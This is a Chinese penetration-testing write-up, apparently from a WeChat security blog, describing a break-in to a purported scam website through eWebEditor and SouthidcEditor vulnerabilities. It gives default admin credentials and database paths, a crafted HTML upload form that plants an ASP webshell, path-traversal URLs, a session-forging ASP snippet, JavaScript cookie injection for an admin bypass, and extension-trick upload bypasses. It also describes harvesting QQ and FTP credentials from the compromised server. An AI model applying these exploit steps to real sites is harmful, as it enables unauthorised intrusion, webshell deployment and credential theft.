ewebeditor漏洞渗透某网站

ewebeditor漏洞渗透某网站

Ewebeditor编辑器是CMS最常见的一款嵌入式多功能编辑器，通过它可以上传多种类型的文件，以及对文本进行格式化编辑，有了它可以让网站内容显示更加美观。但在配置使用过中如何配置不当，则可能存在安全漏洞，存在被渗透的风险。下面介绍如何利用ewebeditor漏洞成功获取某网站的webshell权限等相关过程。

1.1基本信息收集及获取后台管理权限

1.eWebEditor重要信息

（1）默认后台地址：/ewebeditor/admin_login.asp

（2）默认数据库路径：[PATH]/db/ewebeditor.mdb、[PATH]/db/db.mdb、[PATH]/db/%23ewebeditor.mdb

（3）使用默认密码：admin/admin888 或 admin/admin 进入后台，也可尝试 admin/123456，如果简单密码不行，可以尝试利用burpsuite等工具进行密码暴力破解。

（4）后台样式管理获取webshell。单击“样式管理”--可以选择新增样式，或者修改一个非系统样式，将其中图片控件所允许的上传类型后面加上|asp、|asa、|aaspsp或|cer，只要是服务器允许执行的脚本类型即可，点击“提交”并设置工具栏--将“插入图片”控件添加上。而后--预览此样式，点击插入图片，上传WEBSHELL，在“代码”模式中查看上传文件的路径。

（5）当数据库被管理员修改为asp、asa后缀的时候，可以插一句话木马服务端进入数据库，然后一句话木马客户端连接拿下webshell

2.获取后台登陆地址

    获取后台通常有三种方法，第一种是通过SQL注入等扫描工具进行扫描获取；第二种是根据个人经验进行猜测，比如常用的管理后台为“http://www.somesite.com/admin”，也可能为admin888、manage、master等；第三种是特殊类型，后台地址是特殊构造的，没有任何规律可循，怎么复杂就怎么构造，对这种网站可以通过旁注或者在同网段服务器进行嗅探，亦或者通过系统设计的逻辑漏洞，比如某一个页面需要管理认证才能访问，因为没有权限所以需要认证，程序会自动跳转到登录后台。在本例中通过测试获取后台地址为主站二级目录下即“http://034.748239.com/post/admin”，如图1所示，成功获取后台登录地址。

图1获取后台地址

3.进入后台

    使用帐号“admin”，密码“admin888”成功登录后台，如图2所示。系统功能非常简单，主要有银行帐号管理、案件中心、公正申请通缉令管理三大功能。

图2进入后台

1.2漏洞分析及利用

1.分析网站源代码

    通过查看网站使用的模板以及样式表等特征信息，判断该网站使用了SouthidcEditor编辑器，并通过扫描获取了其详细的编辑器地址:

http://034.748230.com/post/admin/SouthidcEditor

http://034.748230.com/post/admin/原版SouthidcEditor

下载其默认mdb数据库（http://034.748230.com/post/admin/SouthidcEditor/Datas/SouthidcEditor.mdb），并对其密码进行破解，获取其帐号对应的密码，使用该密码进行登录，成功进入后台，如图3所示。

图3进入SouthidcEditor编辑器后台管理

2.对样式表进行修改

   单击“样式管理”，在其中新建一个样式名称“112”，并在允许上传文件类型及文件大小设置中添加“|asp|cer|asasp”类型，如图4所示。

图4修改样式

3.使用上传漏洞进行上传

   将以下代码保存为htm文件，并打开该htm文件，上传一个asp的木马文件：

<formaction="http://034.748230.com/post/admin/%E5%8E%9F%E7%89%88SouthidcEditor/upload.asp?action=save&type=image&style=112&cusdir=a.asp"method=post name=myform enctype="multipart/form-data">

<inputtype=file name=uploadfile size=100><br><br>

<inputtype=submit value=upload>

</form>

图5使用构造的上传文件漏洞上传木马

   4.获取上传文件具体地址

   在管理菜单中单击“上传文件管理”，选择样式目录“112”，如图6所示单击上传的文件2015114224141253.asp，直接获取一句话后门的地址。

图6查看并获取上传文件地址

1.3获取Webshell权限及信息扩展收集

1.获取webshell

使用中国菜刀管理工具连接该地址，成功获取webshell，如图7所示，其web目录中全是冒充证券、银行、移民公司、银监会等。

图7获取webshell

2.信息扩展

（1）获取QQ帐号信息

    通过Webshell在系统盘获取QQ帐号信息“C:UsersAll UsersTencentQQProtectQscan”，该服务器上曾经使用QQ帐号1482327338登录过。如图8所示。

图8获取QQ帐号信息

（2）获取Ftp帐号信息

    查看“C:Program Files (x86)”和“C:ProgramFiles”获取FileZilla Server配置文件FileZilla Server.xml，在该文件中保存有Ftp登录帐号和密码信息，如图9所示，在该文件中保存有ftp登录帐号和密码，其密码是采用md5加密。

图9获取ftp登录帐号和密码

（3）诈骗关键字

   通过对网站代码进行分析，发现诈骗网站会在首页添加诸如“网上安全管理下载1”、“网上安全管理下载2”、“网上安全管理下载3”、“网上侦查系统” 和“远程安全协助”等关键字，诱使用户下载“检察院安全管理软件.exe”、“检察院安全控件.exe”、“简易IIS服务器.exe”、“网络安全控件.zip”等远程控制软件，或者访问指定的网站地址，进行银行帐号、密码获取，进而进行诈骗。

（4）使用工具软件对欲仿冒的正规网站进行镜像

  HTTrack Website Copier/3.x [XR&CO'2013],%s -->" -%l "cs, en, *" http://www.spp.gov.cn/ -O1"F:\web\spp" +*.png +*.gif +*.jpg +*.css +*.js-ad.doubleclick.net/* -mime:application/foobar

1.4渗透及ewebeditor编辑器漏洞总结

（1）SouthidcEditor网站编辑器漏洞

数据库下载地址：

原版SouthidcEditor/Datas/SouthidcEditor.mdb

SouthidcEditor/Datas/SouthidcEditor.mdb

管理地址：

SouthidcEditor/Admin_Style.asp

SouthidcEditor/Admin_UploadFile.asp

上传文件保存地址：/SouthidcEditor/UploadFile或者/UploadFile

（2）SouthidcEditor数据库下载地址

Databases/h#asp#mdbaccesss.mdb

Inc/conn.asp

（3）ewebeditor遍历路径漏洞

ewebeditor/admin_uploadfile.asp过滤不严，造成遍历路径漏洞：

ewebeditor/admin_uploadfile.asp?id=14&dir=..

ewebeditor/admin_uploadfile.asp?id=14&dir=../..

ewebeditor/admin_uploadfile.asp?id=14&dir=http://www.****.com/../..

（4）利用WebEditor session欺骗漏洞进入后台

Admin_Private.asp只判断了session，没有判断cookies和路径的验证问题。

新建一个test.asp内容如下:

<%Session("eWebEditor_User")= "11111111"%>

访问test.asp，再访问后台任何文件，例如Admin_Default.asp

（5）eWebEditor 2.7.0 注入漏洞

http://www.somesite.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200

默认表名：eWebEditor_System默认列名：sys_UserName、sys_UserPass，然后利用sqlmap等sql注入工具进行猜解。

（6）ewebeditor v6.0.0 上传漏洞

在编辑器中点击“插入图片”--网络--输入你的WEBSHELL在某空间上的地址（注：文件名称必须为：xxx.jpg.asp 以此类推…），确定后，点击“远程文件自动上传”控件（第一次上传会提示你安装控件，稍等即可），查看“代码”模式找到文件上传路径，访问即可，eweb官方的DEMO也可以这么做，不过对上传目录取消掉了执行权限，所以上传上去也无法执行网马.

（7）eWebEditor PHP/ASP后台通杀漏洞

进入后台/eWebEditor/admin/login.php，随便输入一个用户和密码,会提示出错了。

这时候你清空浏览器的url,然后输入

javascript:alert(document.cookie="adminuser="+escape("admin"));javascript:alert(document.cookie="adminpass="+escape("admin"));javascript:alert(document.cookie="admin="+escape("1"));

而后三次回车,清空浏览器的URL,现在输入一些平常访问不到的文件如/ewebeditor/admin/default.php，就会直接进去。

（8）eWebEditorNetupload.aspx上传漏洞

WebEditorNet主要是一个upload.aspx文件存在上传漏洞。默认上传地址：/ewebeditornet/upload.aspx，可以直接上传一个cer的木马，如果不能上传则在浏览器地址栏中输入javascript:lbtnUpload.click();成功以后查看源代码找到uploadsave查看上传保存地址，默认传到uploadfile这个文件夹里。

本文始发于微信公众号（小兵搞安全）：ewebeditor漏洞渗透某网站